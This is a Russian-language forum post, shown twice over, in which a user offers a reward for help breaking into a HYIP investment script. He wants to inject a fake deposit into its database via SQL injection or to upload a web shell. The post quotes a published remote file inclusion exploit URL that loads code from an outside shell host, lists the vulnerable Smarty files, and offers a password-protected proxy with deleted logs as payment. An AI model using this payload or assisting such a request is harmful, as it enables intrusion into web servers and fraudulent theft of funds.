dokwill
27.06.2007, 19:52
нужна помощь по скрипту за вознаграждение
http://www.megahyiptracer.com/hybann/h/
сдесь лежит мой скрипт - ( это соответственно мой сайт)
вопрос такой - несколько специфический
в этом скрипте и на этом движке есть возможность
видимо через sql injection или как то иначе пропихнуть в базу данных свой депозит.
мне требуется помощь в этом вопросе
нужен вход в базу ( сама строка есть)
либо метод или способ закачки файла(шелл) в
директорию сайта
имеется сам скрипт - могу переслать
имеются название и структура бд
есть публикации такой уязвимости
vendor : www.goldcoders.com
BY : www.hackerz.ir userz,ali
filez ----
inc/libs/Smarty.class.php
inc/libs/Smarty_Compiler.class.php
inc/libs/core/core.display_debug_console.php
inc/libs/core/core.load_plugins.php
inc/libs/core/core.load_resource_plugin.php
inc/libs/core/core.process_cached_inserts.php
inc/libs/core/core.process_compiled_include.php
inc/libs/core/core.read_cache_file.php
+++++++++++++++++++++++++++++++++
u can find more then this one
exploit :
http://victim/inc/libs/Smarty_Compiler.class.php?plugin_file=http://shell/?
ну у меня что то не катит она - мож не стой стороны сморю
вознаграждение - я на своем сайте подвешу ваш
запороленый proxy соответственно все логи и тд будут по вашей просьбе удалены. - скорость 2мбита трафика дам до 1 гига.
стучите все заинтересованные
291783239
http://www.megahyiptracer.com/hybann/h/
сдесь лежит мой скрипт - ( это соответственно мой сайт)
вопрос такой - несколько специфический
в этом скрипте и на этом движке есть возможность
видимо через sql injection или как то иначе пропихнуть в базу данных свой депозит.
мне требуется помощь в этом вопросе
нужен вход в базу ( сама строка есть)
либо метод или способ закачки файла(шелл) в
директорию сайта
имеется сам скрипт - могу переслать
имеются название и структура бд
есть публикации такой уязвимости
vendor : www.goldcoders.com
BY : www.hackerz.ir userz,ali
filez ----
inc/libs/Smarty.class.php
inc/libs/Smarty_Compiler.class.php
inc/libs/core/core.display_debug_console.php
inc/libs/core/core.load_plugins.php
inc/libs/core/core.load_resource_plugin.php
inc/libs/core/core.process_cached_inserts.php
inc/libs/core/core.process_compiled_include.php
inc/libs/core/core.read_cache_file.php
+++++++++++++++++++++++++++++++++
u can find more then this one
exploit :
http://victim/inc/libs/Smarty_Compiler.class.php?plugin_file=http://shell/?
ну у меня что то не катит она - мож не стой стороны сморю
вознаграждение - я на своем сайте подвешу ваш
запороленый proxy соответственно все логи и тд будут по вашей просьбе удалены. - скорость 2мбита трафика дам до 1 гига.
стучите все заинтересованные
291783239